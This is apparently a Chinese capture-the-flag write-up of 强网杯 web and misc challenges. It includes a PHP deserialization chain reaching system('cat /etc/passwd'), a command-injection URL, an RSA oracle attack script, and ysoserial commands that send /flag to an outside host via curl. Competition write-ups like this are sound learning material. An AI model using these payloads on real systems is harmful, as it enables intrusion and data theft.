强网杯wp

Web

web辅助

<?php
class topsolo{
    // Entry point of this file's gadget chain: `name` is invoked from TP(),
    // and __destruct() calls TP(), so whatever object `name` holds gets
    // called when the instance is freed.
    protected $name;

    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    // Call $this->name when it is an object (PHP's gettype() reports closures
    // and invokable objects as "object"; it never returns "function", so that
    // half of the condition is dead).
    public function TP(){
        $kind = gettype($this->name);
        if ($kind !== "function" && $kind !== "object"){
            return;
        }
        $callee = $this->name;
        $callee();
    }

    public function __destruct(){
        $this->TP();
    }
}
class midsolo{
    protected $name;

    public function __construct($name){
        $this->name = $name;
    }

    // Runs on unserialize(): any `name` other than the exact string 'Yasuo'
    // is replaced. This is the only place `name` is checked; Gank() uses the
    // value as-is, so a path that reaches Gank() without going through this
    // hook (a plain `new midsolo(...)`, for instance) works on an unchecked
    // value. Validate in the consumer, not only in the hook.
    public function __wakeup(){
        if ($this->name === 'Yasuo'){
            return;
        }
        $this->name = 'Yasuo';
        echo "No Yasuo! No Soul!\n";
    }

    public function __invoke(){
        $this->Gank();
    }

    // stristr() coerces a non-string `name` to string, which is how an object
    // with __toString (the `jungle` class in this file) gets that method run.
    public function Gank(){
        $found = stristr($this->name, 'Yasuo');
        echo $found ? "Are you orphan?\n" : "Must Be Yasuo!\n";
    }
}
class jungle{
// Sink of this file's gadget chain: converting a jungle to a string calls
// KS(), which runs a fixed OS command through system(). The stristr() call in
// midsolo::Gank() is one such conversion.
protected $name = "";
public function __construct($name = "Lee Sin"){
$this->name = $name;
}

// Executes a fixed shell command; $name is stored but never used here.
public function KS(){
system("cat /etc/passwd");
}
// String coercion hook: runs KS() and evaluates to an empty string.
public function __toString(){
$this->KS();
return "";
}

}
// Assemble the chain outermost-last: topsolo -> midsolo (invoked from TP())
// -> jungle (stringified inside Gank()). Note that the destructor fires for
// this script's own objects too, so running the file executes the chain locally.
$sink = new jungle();
$invoker = new midsolo($sink);
$payload = new topsolo($invoker);

echo urlencode(serialize($payload));
//echo serialize($payload);
exp:

http://eci-2ze4ul2uuvo1j4rae5se.cloudeci1.ichunqiu.com/?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;S:7:"\00*\00pass";O:7:"topsolo":1:{S:7:"\00*\00\6eame";O:7:"midsolo":2:{S:7:"\00*\00\6eame";O:6:"jungle":1:{S:7:"\00*\00\6eame";s:7:"Lee+Sin";}}}

访问下play.php

Fun hash

http://39.101.177.96/?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

Bank

import hashlib
import random
import string
import multiprocessing
import time
import datetime
from multiprocessing import Value
# Sample values, presumably a suffix and a 64-hex-digit (SHA-256 sized) digest
# from the challenge; neither is referenced by work() or the __main__ block
# below (work() rebinds `aa` as a local).
aa = "8nzDVPLL4qKshwHxD"
bb = "743a942a1fc456df8fe92046c124e45abf2a75739838f602a541d27741419b2d"

def work(houzhui, hash):
    """Search for a 3-char printable prefix whose SHA-256 with ``houzhui`` matches ``hash``.

    Each round draws three characters independently from ``string.printable``,
    hashes ``prefix + houzhui`` and compares the hex digest with ``hash``. On a
    match the prefix is printed and the search stops; otherwise it gives up
    silently after 100,000,000 draws. Draws are random with replacement, so the
    same candidate can be tried many times and a hit is not guaranteed.
    """
    alphabet = string.printable
    for _ in range(100000000):
        prefix = "".join(random.choice(alphabet) for _pos in range(3))
        digest = hashlib.sha256((prefix + houzhui).encode('utf-8')).hexdigest()
        if digest == hash:
            print("sha256加密结果:", prefix)
            return

if __name__ == '__main__':
    # raw_input is the Python 2 builtin, so this entry point targets Python 2.
    # The first answer is passed to work() as the suffix (houzhui) and the
    # second as the target digest, regardless of what the prompt labels say.
    suffix = raw_input('sha256:')
    target = raw_input('hash:')
    hash = Value('i', 0)  # allocated but never read
    workers = [
        multiprocessing.Process(target=work, args=(suffix, target))
        for _ in range(0, 10)
    ]
    for proc in workers:
        proc.start()
    for proc in workers:
        proc.join()

主动

http://39.96.23.228:10002/?ip=|cat%20?lag.php

webcry

模数为3的RSA parity oracle

#!/usr/bin/env python
import requests
import gmpy2, time, decimal
from Crypto.Util.number import long_to_bytes, bytes_to_long

# Challenge endpoint plus the session cookie that carries the RSA parameters;
# the cookie's `encrypto_flag`, `public_n` and `public_e` fields appear to be
# the same values bound to `c`, `n` and `e` below.
url = "http://106.14.66.189/abi.php"
headers = {
    'Cookie': "PHPSESSID=thaf2g7rq7n1cafm86edihe7vd; encrypto_flag=44789525312956413906892336250587100901785996197706985366356847255133267195692846768617452847582513676269061482969582482095141594794433479479926777821516456699901260341298945007995333484920041363377993029238678007418633698524067991348058422339209572846782559138462021462105307254461623915829960261779837027109; public_n=8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157; public_e=010001",
}
# One probe POST issued at import time; its response is never read.
data = {'this[is.able': 4}
res = requests.post(url, headers=headers, data=data)

e = 65537
n = 0x8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157
c = 44789525312956413906892336250587100901785996197706985366356847255133267195692846768617452847582513676269061482969582482095141594794433479479926777821516456699901260341298945007995333484920041363377993029238678007418633698524067991348058422339209572846782559138462021462105307254461623915829960261779837027109


def oracle(c1):
    """Submit ciphertext ``c1`` to the challenge and return the leaked digit.

    The response body's character at index 7 is parsed as an int; partial()
    maps that value through ``mab`` to a residue class mod 3. Uses the
    module-level ``url`` and ``headers``.
    """
    reply = requests.post(url, headers=headers, data={'this[is.able': c1})
    return int(reply.text[7])
# Map from the oracle's answer to the index k (0..2) of the sub-interval that
# partial() keeps: key (-n * i) % 3 -> i. Printed once for inspection.
mab = {(-n * i) % 3: i for i in range(3)}
print(mab)
# exit
def partial(c, e, n):
    """Narrow the plaintext interval [lb, ub) using the mod-3 oracle.

    Each round multiplies the ciphertext by 3**e mod n (so the decrypted value
    becomes 3*m mod n), asks the oracle, maps its answer through ``mab`` to one
    of three equal thirds of the current interval and keeps that third. The
    round number and the bounds (hex) are printed each round; the final upper
    bound is printed as bytes and returned. The bounds use integer division,
    so per-round rounding is not compensated (``decimal`` is imported at the
    top of the script but unused). Relies on the module-level ``oracle`` and
    ``mab``.
    """
    lb, ub = 0, n
    rounds = 0
    while ub > lb:
        print(rounds, hex(lb), hex(ub))
        c = (pow(3, e) * c) % n
        k = mab[oracle(c)]
        third = (ub - lb) // 3
        lb += third * k
        ub = lb + third
        rounds += 1
    print(long_to_bytes(ub))
    return ub

# Run the recovery against the module-level c, e, n; the return value is discarded.
partial(c, e, n)

easy_java

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections5 'curl -F "a=@/flag" http://203.195.224.127:2333'
java -jar ysoserial.jar JRMPClient '203.195.224.127:9090' > jrmp1

记得用json传

Misc

miscstudy

访问http://39.99.247.28/fonts/1,得到flag1 flag{level1_begin_and_level2_is_come

得到ssl key log file,把log file 导入Wireshark,可以解密出一个http流量包,链接为https://www.qiangwangbei.com/images/4e5d47b2db53654959295bba216858932.png

可以看到11块有一个base64,解码得到flag3 level3_start_it

提取第八第九第十块,通过https://www.base64decode.net/这个网站解码得到如下

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000010011000010000000001110000111111111110000111111111111000000011011100010000000001110000111111111110000110000000011001001111111001000000000110011100100000000010000110000000011001000011011001000000000000111100100000000010000110011110011001000010011001001110000001110100100111110010000110011110011000010000000111001111111001000000100111110010000110011110011000000000000111001111011001000000100111110010000110011110011001110010011111111110011001110000000111110010000110000000011001100000000011110011011011000000100000000010000110000000011001001100000001110001111111001100100000000010000111111111111001001100100100110011011001001100111111111110000111111111111001001100100110000010011001001100111111111110000000000000000001001111111001001100011100010000000000000000000000000000000001000111110001001100001110110000000000000000000111001100011110000000100000001100000111111100111100011100000011000000000000000000100000001100000000001100100000000000000001000000100001110000100000011110011000001100000001000000000111001100111111000000000000001000100111001111100001001100000111001100111111000000000000001100100111001111100001001100000110011100000001111100000001000010000010010011100000010010000000110000000011101100000011100010000110000011100000000000000001110000011111001100000111111110000110001111111001000000000000011100100110000000000110000011100111001111100100010010000000011100100100000000000100000011100111001111100110010010000001110000011001111111100000001110000111111100000111001110000001100000001001111111000000001110000111111100000011000110000000000010000001000000000000001100000111001100100000010010000000000000000011000000000000000000000111001101110000000000000001000100111111000010000000010000001111111110111110000000000001100000000111000000011111110011000000110000000001000000000001110000000111000000011111110011100000010000000001000000000111000010011111111
1111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
from PIL import Image, ImageDraw, ImageFilter

# Bitmap extracted from the challenge: one '0'/'1' character per pixel, row-major,
# expected to hold width * height characters (the two adjacent literals are
# concatenated by Python into one bytes object).
s = (
    b"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000010011000010000000001110000111111111110000111111111111000000011011100010000000001110000111111111110000110000000011001001111111001000000000110011100100000000010000110000000011001000011011001000000000000111100100000000010000110011110011001000010011001001110000001110100100111110010000110011110011000010000000111001111111001000000100111110010000110011110011000000000000111001111011001000000100111110010000110011110011001110010011111111110011001110000000111110010000110000000011001100000000011110011011011000000100000000010000110000000011001001100000001110001111111001100100000000010000111111111111001001100100100110011011001001100111111111110000111111111111001001100100110000010011001001100111111111110000000000000000001001111111001001100011100010000000000000000000000000000000001000111110001001100001110110000000000000000000111001100011110000000100000001100000111111100111100011100000011000000000000000000100000001100000000001100100000000000000001000000100001110000100000011110011000001100000001000000000111001100111111000000000000001000100111001111100001001100000111001100111111000000000000001100100111001111100001001100000110011100000001111100000001000010000010010011100000010010000000110000000011101100000011100010000110000011100000000000000001110000011111001100000111111110000110001111111001000000000000011100100110000000000110000011100111001111100100010010000000011100100100000000000100000011100111001111100110010010000001110000011001111111100000001110000111111100000111001110000001100000001001111111000000001110000111111100000011000110000000000010000001000000000000001100000111001100100000010010000000000000000011000000000000000000000111001101110000000000000001000100111111000010000000010000001111111110111110000000000001100000000111000000011111110011000000110000000001000000000001110000000111000000011111110011100000010000000001000000000111000010011"
    b"1111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
)

width = 60
height = 60
img = Image.new('RGB', (width, height), (0, 0, 0))
draw = ImageDraw.Draw(img)

WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
# Indexing a bytes object yields ints, hence the comparison with 0x30 ('0'):
# '0' characters become white pixels, anything else stays black. Pixels are
# visited row by row, so index -> (y, x) is a divmod by the row width.
for index in range(width * height):
    y, x = divmod(index, width)
    draw.point((x, y), fill=WHITE if s[index] == 0x30 else BLACK)

img.save('bmp5.bmp', 'bmp')

得到一个二维码,扫描得到如下

链接:https://pan.baidu.com/s/1wVJ7d0RLW8Rj-HOTL9Shug

提取码:1lms

打开压缩包的图片,经过stegbreak爆破密码得到

通过jphs解密得到

解密得到flag4 level4_here_all

https://pan.baidu.com/s/1o43y4UGkm1eP-RViC25aOw mrpt

解压得到flag 5 level5_is_aaa

接下来crc32爆破,得到flag6 level6_isready

import binascii
import itertools

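def str2num(s):
    """Parse a hexadecimal string (e.g. a CRC-32 value) into an int."""
    return int(s, 16)


# Character set for the 5-byte candidates. The original literal carried stray
# quotes around it (''...''') that made the line a syntax error.
dic = '_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
#crc1= str2num("9aeacc13")
#crc2= str2num("eed7e184")
crc3 = str2num("289585af")


def crc32_matches(charset, target, length):
    """Yield every ``length``-char string over ``charset`` whose CRC-32 equals ``target``.

    Candidates are enumerated in the order of ``charset`` (leftmost position
    slowest), as the original nested loops did. The CRC is masked to 32 bits
    so the comparison behaves the same on Python 2 and 3, and the candidate is
    encoded because ``binascii.crc32`` needs bytes on Python 3.
    """
    for chars in itertools.product(charset, repeat=length):
        candidate = "".join(chars)
        if (binascii.crc32(candidate.encode('ascii')) & 0xffffffff) == target:
            yield candidate


if __name__ == '__main__':
    # len(dic) ** 5 candidates: this loop is the slow part, exactly as before;
    # every match is printed (the original did not stop at the first hit).
    for match in crc32_matches(dic, crc3, 5):
        print("crc3:", match)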

接下来用level5多出来的那个图片进行明文攻击,要用好压。。。

接下来是盲水印

接下来是html隐写,密码如下

最终flag

flag{level1_begin_and_level2_is_comelevel3_start_itlevel4_here_alllevel5_is_aaalevel6_isreadylevel7isherethe_misc_examaaaaaaa_!!!}

upload

流量包导出对象,foremost一下得到一张图片。steghide extract -sf 00000000.jpg,密码试了几个,123456成功了,导出flag.txt

END

image-20200824173705000

线下见,求轻虐